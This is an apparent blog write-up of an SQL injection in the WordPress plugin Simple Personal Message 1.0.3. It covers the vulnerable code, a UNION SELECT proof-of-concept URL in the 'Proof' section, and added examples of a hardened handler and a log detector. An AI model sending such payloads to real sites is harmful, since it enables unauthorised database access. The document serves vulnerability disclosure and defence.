Wordpress_Plugin_SinglePersonalMessage1.0.3 sql injection
langu_xyz

exploit-db

# Exploit Title: Single Personal Message 1.0.3 – Plugin WordPress – Sql Injection
# Date: 28/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/simple-personal-message/
# Software Link: https://wordpress.org/plugins/simple-personal-message/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.0.3
# Tested on: Windows 8

0X01 Code analysis

It took some effort to find a vulnerable version on GitHub.

The directory structure is shown in the figure.

Since this is an injection, the starting point is the interaction points: search for SQL statements and work through the directory file by file.

Searching for interaction points from the outside in, admin/class-simple-personal-message-admin.php contains dozens of them, for example the following:

$user_login = esc_sql(wp_get_current_user()->user_login);
global $wpdb;
$table_name = $wpdb->prefix . 'spm_message';
$wpdb->get_results("SELECT * FROM $table_name WHERE receiver = '" . $user_login . "' AND status = 0 AND receiver_deleted = 0", OBJECT);
return $wpdb->num_rows;

However, every value in this file is filtered with esc_sql.

Looking further inward, in admin/partials/simple-personal-message-admin-view.php we find:

<?php
global $wpdb;
$table = $wpdb->prefix . 'spm_message';
$id = esc_attr($_GET['message']);
$message = $wpdb->get_results("SELECT * FROM $table WHERE id = $id");
$user = get_user_by('login', $message[0]->sender);
?>

It is clear to see that in
$id = esc_attr($_GET['message']);
$message = $wpdb->get_results("SELECT * FROM $table WHERE id = $id");

the message parameter is concatenated into the SQL statement without any filtering: esc_attr() escapes for an HTML attribute context and does nothing for SQL, so the value reaches the query unchanged.
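The following is an added example, not code from the plugin or from the original post: the vulnerable sink as found in simple-personal-message-admin-view.php next to a hardened form that coerces the id to an integer and binds it through $wpdb->prepare(). It assumes the WordPress globals and helpers the plugin already relies on ($wpdb, absint, wp_get_current_user); the ownership check at the end is an assumed policy, not something the plugin implements.

```php
<?php
// Added example (not the plugin's own code): vulnerable sink beside a hardened version.

/**
 * Vulnerable form, as found in the plugin: esc_attr() only escapes for an
 * HTML attribute context and does nothing for SQL, so $_GET['message'] is
 * interpolated into the query unchanged.
 */
function spm_view_message_vulnerable() {
    global $wpdb;
    $table = $wpdb->prefix . 'spm_message';
    $id    = esc_attr( $_GET['message'] );
    return $wpdb->get_results( "SELECT * FROM $table WHERE id = $id" );
}

/**
 * Hardened form: coerce the id to a non-negative integer, reject zero (no
 * valid row has id 0) and bind it with $wpdb->prepare(), so the value can
 * never change the structure of the query. The table name comes from
 * $wpdb->prefix, which is not user-controlled, and is interpolated as before.
 */
function spm_view_message_hardened() {
    global $wpdb;

    if ( ! isset( $_GET['message'] ) ) {
        return null;
    }

    // absint() keeps only the leading integer: "1 UNION SELECT ..." becomes 1.
    $id = absint( $_GET['message'] );
    if ( 0 === $id ) {
        return null;
    }

    $table = $wpdb->prefix . 'spm_message';
    $sql   = $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $id );
    $rows  = $wpdb->get_results( $sql );

    // Assumed authorisation policy (not in the original plugin): only the
    // sender or the receiver of a message may view it, even with a valid id.
    $login = wp_get_current_user()->user_login;
    if ( empty( $rows ) || ( $rows[0]->sender !== $login && $rows[0]->receiver !== $login ) ) {
        return null;
    }
    return $rows;
}
```

With the hardened form, the payload shown later in this post collapses to `id = 1` before the query is built, and a user who is neither sender nor receiver gets no rows at all; both changes are independent of each other and worth applying together.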

0x02 Proof

Under normal conditions:

Now append to the message parameter:

http://localhost/wordpress/wp-admin/admin.php?page=simple-personal-message-outbox&action=view&message=1%20UNION%20SELECT%201,2.3,4,5,user(),7,8,9,10,11,12%20FROM%20wp_terms%20WHERE%20term_id=1
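Since a legitimate request to this view only ever carries a bare integer in `message`, an operator can spot exploitation attempts from the access log without any signature list. The example below is added here and is not part of the original post or the plugin: it parses constructed combined-format log lines, URL-decodes the query string, and reports requests to the plugin's view action whose `message` value is not a plain integer.

```php
<?php
// Added example (not the plugin's or the author's code): flag requests to the
// plugin's message view whose `message` parameter is not a bare integer id.
// The log lines below are constructed for illustration.
$spm_log_sample = <<<'LOG'
10.0.0.5 - - [27/Oct/2016:21:00:01 +0800] "GET /wp-admin/admin.php?page=simple-personal-message-outbox&action=view&message=1 HTTP/1.1" 200 5120
10.0.0.5 - - [27/Oct/2016:21:00:07 +0800] "GET /wp-admin/admin.php?page=simple-personal-message-outbox&action=view&message=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 5310
10.0.0.9 - - [27/Oct/2016:21:00:09 +0800] "GET /wp-admin/admin.php?page=simple-personal-message-inbox&action=view&message=42 HTTP/1.1" 200 4990
10.0.0.9 - - [27/Oct/2016:21:00:12 +0800] "GET /wp-admin/admin.php?page=simple-personal-message-inbox&action=view&message=7%27 HTTP/1.1" 200 5001
LOG;

/**
 * Return the suspicious requests, each as ['ip' => ..., 'message' => ...]
 * with the `message` value already URL-decoded.
 */
function spm_find_suspicious_message_params( string $log ): array {
    $hits = [];
    foreach ( explode( "\n", trim( $log ) ) as $line ) {
        // Client IP and request target from a combined-format log line.
        if ( ! preg_match( '/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/', $line, $m ) ) {
            continue;
        }
        list( , $ip, $target ) = $m;

        $query = parse_url( $target, PHP_URL_QUERY );
        if ( $query === null || $query === false ) {
            continue;
        }
        parse_str( $query, $params ); // parse_str() URL-decodes the values

        // Only the plugin's message view is of interest.
        if ( ! isset( $params['page'], $params['action'], $params['message'] )
            || strpos( $params['page'], 'simple-personal-message' ) !== 0
            || $params['action'] !== 'view' ) {
            continue;
        }

        // A bare decimal integer is the only legitimate shape for `message`.
        if ( ! preg_match( '/^\d+$/', $params['message'] ) ) {
            $hits[] = [ 'ip' => $ip, 'message' => $params['message'] ];
        }
    }
    return $hits;
}

foreach ( spm_find_suspicious_message_params( $spm_log_sample ) as $hit ) {
    printf( "suspicious message param from %s: %s\n", $hit['ip'], $hit['message'] );
}
```

On the sample above the first and third lines pass and the second and fourth are reported; the same allow-list check (integer or nothing) is what the hardened handler enforces server-side, so log review and the fix agree on what a valid request looks like.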

  • Post title:Wordpress_Plugin_SinglePersonalMessage1.0.3 sql injection
  • Post author:langu_xyz
  • Create time:2016-10-27 21:00:00
  • Post link:https://blog.langu.xyz/Wordpress_Plugin_SinglePersonalMessage1.0.3 sql injection/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.